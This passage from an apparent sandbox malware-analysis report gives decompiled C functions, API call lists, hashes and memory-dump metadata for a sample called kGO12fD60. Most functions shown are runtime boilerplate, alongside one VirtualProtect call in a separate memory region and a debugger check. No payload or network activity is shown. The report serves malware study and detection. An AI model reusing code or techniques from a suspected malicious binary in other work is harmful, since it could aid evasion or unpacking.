                                                                                                                                                                                                        0x0040b6b5
                                                                                                                                                                                                        0x0040b6b7
                                                                                                                                                                                                        0x0040b6bc
                                                                                                                                                                                                        0x0040b6c1
                                                                                                                                                                                                        0x0040b6c4
                                                                                                                                                                                                        0x0040b6c6
                                                                                                                                                                                                        0x0040b6c8
                                                                                                                                                                                                        0x0040b6cf
                                                                                                                                                                                                        0x0040b714
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040b6d1
                                                                                                                                                                                                        0x0040b6d3
                                                                                                                                                                                                        0x0040b6d9
                                                                                                                                                                                                        0x0040b6de
                                                                                                                                                                                                        0x0040b6e4
                                                                                                                                                                                                        0x0040b6e7
                                                                                                                                                                                                        0x0040b6e9
                                                                                                                                                                                                        0x0040b6eb
                                                                                                                                                                                                        0x0040b6ec
                                                                                                                                                                                                        0x0040b6ed
                                                                                                                                                                                                        0x0040b6f3
                                                                                                                                                                                                        0x0040b6f4
                                                                                                                                                                                                        0x0040b6fb
                                                                                                                                                                                                        0x0040b700
                                                                                                                                                                                                        0x0040b704
                                                                                                                                                                                                        0x0040b706
                                                                                                                                                                                                        0x0040b715
                                                                                                                                                                                                        0x0040b723
                                                                                                                                                                                                        0x0040b725
                                                                                                                                                                                                        0x0040b727
                                                                                                                                                                                                        0x0040b73a
                                                                                                                                                                                                        0x0040b73c
                                                                                                                                                                                                        0x0040b725
                                                                                                                                                                                                        0x0040b704
                                                                                                                                                                                                        0x0040b6cf
                                                                                                                                                                                                        0x0040b742
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040af7b
                                                                                                                                                                                                        0x0040af8b
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • _malloc.LIBCMT ref: 0040AF80
                                                                                                                                                                                                          • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                                                                                                                          • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                                                                                                                          • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                                                                                                                                        • std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3
                                                                                                                                                                                                          • Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08
                                                                                                                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
                                                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040AFC5
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.401764735.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000005.00000002.401764735.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.401764735.000000000044D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_400000_kGO12fD60.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1411284514-0
                                                                                                                                                                                                        • Opcode ID: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
                                                                                                                                                                                                        • Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 184 40e7ee-40e7f6 call 40e7c3 186 40e7fb-40e7ff ExitProcess 184->186
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E0040E7EE(int _a4) {
                                                                                                                                                                                                        
                                                                                                                                                                                                        				E0040E7C3(_a4); // executed
                                                                                                                                                                                                        				ExitProcess(_a4);
                                                                                                                                                                                                        			}



                                                                                                                                                                                                        0x0040e7f6
                                                                                                                                                                                                        0x0040e7ff

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • ___crtCorExitProcess.LIBCMT ref: 0040E7F6
                                                                                                                                                                                                          • Part of subcall function 0040E7C3: GetModuleHandleW.KERNEL32(mscoree.dll,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7CD
                                                                                                                                                                                                          • Part of subcall function 0040E7C3: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040E7DD
                                                                                                                                                                                                          • Part of subcall function 0040E7C3: CorExitProcess.MSCOREE(00000001,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7EA
                                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 0040E7FF
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.401764735.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000005.00000002.401764735.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.401764735.000000000044D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_400000_kGO12fD60.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2427264223-0
                                                                                                                                                                                                        • Opcode ID: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
                                                                                                                                                                                                        • Instruction ID: d9ec683f250bcd397ae0bae66fbc2b9097e114182cfe22e5ca4178904d999afd
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: ADB09B31000108BFDB112F13DC09C493F59DB40750711C435F41805071DF719D5195D5
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 187 5170040-51700f4 VirtualProtect 190 51700f6-51700fc 187->190 191 51700fd-5170145 187->191 190->191
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • VirtualProtect.KERNEL32(?,?,?,?), ref: 051700E4
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.407394725.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000005.00000002.407316723.0000000005130000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5130000_kGO12fD60.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ProtectVirtual
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 544645111-0
                                                                                                                                                                                                        • Opcode ID: 078d607702bac820846fc9ab9631ad691b541b4ccc30ac15fbfe61a6d0a07653
                                                                                                                                                                                                        • Instruction ID: c723925463143c65eeb6a7e19d1532a044bf99f736c92c1d369ab625146c3edf
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 078d607702bac820846fc9ab9631ad691b541b4ccc30ac15fbfe61a6d0a07653
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3A31A7B8D002189FCF10CFA9D984ADEFBB1BF49310F10902AE814B7210D739A945CF94
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 196 5170300-517038e FindCloseChangeNotification 199 5170397-51703d9 196->199 200 5170390-5170396 196->200 200->199
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • FindCloseChangeNotification.KERNEL32(?), ref: 0517037E
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.407394725.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000005.00000002.407316723.0000000005130000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5130000_kGO12fD60.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2591292051-0
                                                                                                                                                                                                        • Opcode ID: 099839db8e65bdb9f9fa38d60dec7941dad3f75cdcf9a906fe49d4db92e23a0f
                                                                                                                                                                                                        • Instruction ID: 4f65476bce899f32584817b41e308cab7aa3c8d4d8bf0d35cde34ad6d48f5359
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 099839db8e65bdb9f9fa38d60dec7941dad3f75cdcf9a906fe49d4db92e23a0f
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2B31ABB4D012189FCB14CFAAD984ADEFBB5EF49314F10942AE815B7340D778A901CFA4
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 205 40d534-40d556 HeapCreate 206 40d558-40d559 205->206 207 40d55a-40d563 205->207
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E0040D534(intOrPtr _a4) {
                                                                                                                                                                                                        				void* _t6;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                                                                                                                                                                                                        				 *0x4234b4 = _t6;
                                                                                                                                                                                                        				if(_t6 != 0) {
                                                                                                                                                                                                        					 *0x4250b0 = 1;
                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					return _t6;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}




                                                                                                                                                                                                        0x0040d549
                                                                                                                                                                                                        0x0040d54f
                                                                                                                                                                                                        0x0040d556
                                                                                                                                                                                                        0x0040d55d
                                                                                                                                                                                                        0x0040d563
                                                                                                                                                                                                        0x0040d559
                                                                                                                                                                                                        0x0040d559
                                                                                                                                                                                                        0x0040d559

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • HeapCreate.KERNEL32(00000000,00001000,00000000), ref: 0040D549
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.401764735.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000005.00000002.401764735.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.401764735.000000000044D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_400000_kGO12fD60.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateHeap
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 10892065-0
                                                                                                                                                                                                        • Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                                                                                                                                                        • Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 208 40ea0a-40ea16 call 40e8de 210 40ea1b-40ea1f 208->210
                                                                                                                                                                                                        C-Code - Quality: 25%
                                                                                                                                                                                                        			E0040EA0A(intOrPtr _a4) {
                                                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                                                        				void* _t2;
                                                                                                                                                                                                        				void* _t3;
                                                                                                                                                                                                        				void* _t4;
                                                                                                                                                                                                        				void* _t5;
                                                                                                                                                                                                        				void* _t8;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_push(0);
                                                                                                                                                                                                        				_push(0);
                                                                                                                                                                                                        				_push(_a4);
                                                                                                                                                                                                        				_t2 = E0040E8DE(_t3, _t4, _t5, _t8); // executed
                                                                                                                                                                                                        				return _t2;
                                                                                                                                                                                                        			}









                                                                                                                                                                                                        0x0040ea0f
                                                                                                                                                                                                        0x0040ea11
                                                                                                                                                                                                        0x0040ea13
                                                                                                                                                                                                        0x0040ea16
                                                                                                                                                                                                        0x0040ea1f

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • _doexit.LIBCMT ref: 0040EA16
                                                                                                                                                                                                          • Part of subcall function 0040E8DE: __lock.LIBCMT ref: 0040E8EC
                                                                                                                                                                                                          • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E923
                                                                                                                                                                                                          • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E938
                                                                                                                                                                                                          • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E962
                                                                                                                                                                                                          • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E978
                                                                                                                                                                                                          • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E985
                                                                                                                                                                                                          • Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9B4
                                                                                                                                                                                                          • Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9C4
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.401764735.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000005.00000002.401764735.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.401764735.000000000044D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_400000_kGO12fD60.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: __decode_pointer$__initterm$__lock_doexit
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1597249276-0
                                                                                                                                                                                                        • Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                                                                                                                                                        • Instruction ID: a0257ab8b89ab24c4dda27abc63ac43d0f25756bab2839dd78a8b277d7454467
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                                                                                                                                                        • Instruction Fuzzy Hash: D2B0923298420833EA202643AC03F063B1987C0B64E244031BA0C2E1E1A9A2A9618189
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 85%
                                                                                                                                                                                                        			E0040CE09(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                                                                                                                                                                        				intOrPtr _v0;
                                                                                                                                                                                                        				void* _v804;
                                                                                                                                                                                                        				intOrPtr _v808;
                                                                                                                                                                                                        				intOrPtr _v812;
                                                                                                                                                                                                        				intOrPtr _t6;
                                                                                                                                                                                                        				intOrPtr _t11;
                                                                                                                                                                                                        				intOrPtr _t12;
                                                                                                                                                                                                        				intOrPtr _t13;
                                                                                                                                                                                                        				long _t17;
                                                                                                                                                                                                        				intOrPtr _t21;
                                                                                                                                                                                                        				intOrPtr _t22;
                                                                                                                                                                                                        				intOrPtr _t25;
                                                                                                                                                                                                        				intOrPtr _t26;
                                                                                                                                                                                                        				intOrPtr _t27;
                                                                                                                                                                                                        				intOrPtr* _t31;
                                                                                                                                                                                                        				void* _t34;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t27 = __esi;
                                                                                                                                                                                                        				_t26 = __edi;
                                                                                                                                                                                                        				_t25 = __edx;
                                                                                                                                                                                                        				_t22 = __ecx;
                                                                                                                                                                                                        				_t21 = __ebx;
                                                                                                                                                                                                        				_t6 = __eax;
                                                                                                                                                                                                        				_t34 = _t22 -  *0x422234; // 0xe46f3cd8
                                                                                                                                                                                                        				if(_t34 == 0) {
                                                                                                                                                                                                        					asm("repe ret");
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				 *0x423b98 = _t6;
                                                                                                                                                                                                        				 *0x423b94 = _t22;
                                                                                                                                                                                                        				 *0x423b90 = _t25;
                                                                                                                                                                                                        				 *0x423b8c = _t21;
                                                                                                                                                                                                        				 *0x423b88 = _t27;
                                                                                                                                                                                                        				 *0x423b84 = _t26;
                                                                                                                                                                                                        				 *0x423bb0 = ss;
                                                                                                                                                                                                        				 *0x423ba4 = cs;
                                                                                                                                                                                                        				 *0x423b80 = ds;
                                                                                                                                                                                                        				 *0x423b7c = es;
                                                                                                                                                                                                        				 *0x423b78 = fs;
                                                                                                                                                                                                        				 *0x423b74 = gs;
                                                                                                                                                                                                        				asm("pushfd");
                                                                                                                                                                                                        				_pop( *0x423ba8);
                                                                                                                                                                                                        				 *0x423b9c =  *_t31;
                                                                                                                                                                                                        				 *0x423ba0 = _v0;
                                                                                                                                                                                                        				 *0x423bac =  &_a4;
                                                                                                                                                                                                        				 *0x423ae8 = 0x10001;
                                                                                                                                                                                                        				_t11 =  *0x423ba0; // 0x0
                                                                                                                                                                                                        				 *0x423a9c = _t11;
                                                                                                                                                                                                        				 *0x423a90 = 0xc0000409;
                                                                                                                                                                                                        				 *0x423a94 = 1;
                                                                                                                                                                                                        				_t12 =  *0x422234; // 0xe46f3cd8
                                                                                                                                                                                                        				_v812 = _t12;
                                                                                                                                                                                                        				_t13 =  *0x422238; // 0x1b90c327
                                                                                                                                                                                                        				_v808 = _t13;
                                                                                                                                                                                                        				 *0x423ae0 = IsDebuggerPresent();
                                                                                                                                                                                                        				_push(1);
                                                                                                                                                                                                        				E004138FC(_t14);
                                                                                                                                                                                                        				SetUnhandledExceptionFilter(0);
                                                                                                                                                                                                        				_t17 = UnhandledExceptionFilter(0x41fb80);
                                                                                                                                                                                                        				if( *0x423ae0 == 0) {
                                                                                                                                                                                                        					_push(1);
                                                                                                                                                                                                        					E004138FC(_t17);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                                                                                        			}



















                                                                                                                                                                                                        0x0040ce09
                                                                                                                                                                                                        0x0040ce09
                                                                                                                                                                                                        0x0040ce09
                                                                                                                                                                                                        0x0040ce09
                                                                                                                                                                                                        0x0040ce09
                                                                                                                                                                                                        0x0040ce09
                                                                                                                                                                                                        0x0040ce09
                                                                                                                                                                                                        0x0040ce0f
                                                                                                                                                                                                        0x0040ce11
                                                                                                                                                                                                        0x0040ce11
                                                                                                                                                                                                        0x00413644
                                                                                                                                                                                                        0x00413649
                                                                                                                                                                                                        0x0041364f
                                                                                                                                                                                                        0x00413655
                                                                                                                                                                                                        0x0041365b
                                                                                                                                                                                                        0x00413661
                                                                                                                                                                                                        0x00413667
                                                                                                                                                                                                        0x0041366e
                                                                                                                                                                                                        0x00413675
                                                                                                                                                                                                        0x0041367c
                                                                                                                                                                                                        0x00413683
                                                                                                                                                                                                        0x0041368a
                                                                                                                                                                                                        0x00413691
                                                                                                                                                                                                        0x00413692
                                                                                                                                                                                                        0x0041369b
                                                                                                                                                                                                        0x004136a3
                                                                                                                                                                                                        0x004136ab
                                                                                                                                                                                                        0x004136b6
                                                                                                                                                                                                        0x004136c0
                                                                                                                                                                                                        0x004136c5
                                                                                                                                                                                                        0x004136ca
                                                                                                                                                                                                        0x004136d4
                                                                                                                                                                                                        0x004136de
                                                                                                                                                                                                        0x004136e3
                                                                                                                                                                                                        0x004136e9
                                                                                                                                                                                                        0x004136ee
                                                                                                                                                                                                        0x004136fa
                                                                                                                                                                                                        0x004136ff
                                                                                                                                                                                                        0x00413701
                                                                                                                                                                                                        0x00413709
                                                                                                                                                                                                        0x00413714
                                                                                                                                                                                                        0x00413721
                                                                                                                                                                                                        0x00413723
                                                                                                                                                                                                        0x00413725
                                                                                                                                                                                                        0x0041372a
                                                                                                                                                                                                        0x0041373e

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • IsDebuggerPresent.KERNEL32 ref: 004136F4
                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
                                                                                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
                                                                                                                                                                                                        • TerminateProcess.KERNEL32(00000000), ref: 00413737
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.401764735.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000005.00000002.401764735.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.401764735.000000000044D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_400000_kGO12fD60.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2579439406-0
                                                                                                                                                                                                        • Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                                                                                                        • Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E0040ADB0(intOrPtr* __ecx) {
                                                                                                                                                                                                        				void* _t5;
                                                                                                                                                                                                        				intOrPtr* _t11;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t11 = __ecx;
                                                                                                                                                                                                        				_t5 =  *(__ecx + 8);
                                                                                                                                                                                                        				 *__ecx = 0x41eff0;
                                                                                                                                                                                                        				if(_t5 != 0) {
                                                                                                                                                                                                        					_t5 =  *((intOrPtr*)( *((intOrPtr*)( *_t5 + 8))))(_t5);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if( *(_t11 + 0xc) != 0) {
                                                                                                                                                                                                        					_t5 = GetProcessHeap();
                                                                                                                                                                                                        					if(_t5 != 0) {
                                                                                                                                                                                                        						return HeapFree(_t5, 0,  *(_t11 + 0xc));
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t5;
                                                                                                                                                                                                        			}





                                                                                                                                                                                                        0x0040adb3
                                                                                                                                                                                                        0x0040adb5
                                                                                                                                                                                                        0x0040adb8
                                                                                                                                                                                                        0x0040adc0
                                                                                                                                                                                                        0x0040adc8
                                                                                                                                                                                                        0x0040adc8
                                                                                                                                                                                                        0x0040adce
                                                                                                                                                                                                        0x0040add0
                                                                                                                                                                                                        0x0040add8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040ade1
                                                                                                                                                                                                        0x0040add8
                                                                                                                                                                                                        0x0040ade8

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetProcessHeap.KERNEL32 ref: 0040ADD0
                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.401764735.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000005.00000002.401764735.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.401764735.000000000044D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_400000_kGO12fD60.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Heap$FreeProcess
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3859560861-0
                                                                                                                                                                                                        • Opcode ID: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                                                                                                                                                        • Instruction ID: 72dd180cd7110ee49b406fd12918c6a771032a3efea8c67e715e4993f3fed615
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 54E09A312003009FC320AB61DC08FA337AAEF88311F04C829E55A936A0DB78EC42CB58
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                                                                                        			E00417081(short* __ecx, int _a4, signed int _a8, char* _a12, int _a16, char* _a20, int _a24, int _a28, intOrPtr _a32) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				int _v12;
                                                                                                                                                                                                        				int _v16;
                                                                                                                                                                                                        				int _v20;
                                                                                                                                                                                                        				intOrPtr _v24;
                                                                                                                                                                                                        				void* _v36;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                                                        				signed int _t110;
                                                                                                                                                                                                        				intOrPtr _t112;
                                                                                                                                                                                                        				intOrPtr _t113;
                                                                                                                                                                                                        				short* _t115;
                                                                                                                                                                                                        				short* _t116;
                                                                                                                                                                                                        				char* _t120;
                                                                                                                                                                                                        				short* _t121;
                                                                                                                                                                                                        				short* _t123;
                                                                                                                                                                                                        				short* _t127;
                                                                                                                                                                                                        				int _t128;
                                                                                                                                                                                                        				short* _t141;
                                                                                                                                                                                                        				signed int _t144;
                                                                                                                                                                                                        				void* _t146;
                                                                                                                                                                                                        				short* _t147;
                                                                                                                                                                                                        				signed int _t150;
                                                                                                                                                                                                        				short* _t153;
                                                                                                                                                                                                        				char* _t157;
                                                                                                                                                                                                        				int _t160;
                                                                                                                                                                                                        				long _t162;
                                                                                                                                                                                                        				signed int _t174;
                                                                                                                                                                                                        				signed int _t178;
                                                                                                                                                                                                        				signed int _t179;
                                                                                                                                                                                                        				int _t182;
                                                                                                                                                                                                        				short* _t184;
                                                                                                                                                                                                        				signed int _t186;
                                                                                                                                                                                                        				signed int _t188;
                                                                                                                                                                                                        				short* _t189;
                                                                                                                                                                                                        				int _t191;
                                                                                                                                                                                                        				intOrPtr _t194;
                                                                                                                                                                                                        				int _t207;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t110 =  *0x422234; // 0xe46f3cd8
                                                                                                                                                                                                        				_v8 = _t110 ^ _t188;
                                                                                                                                                                                                        				_t184 = __ecx;
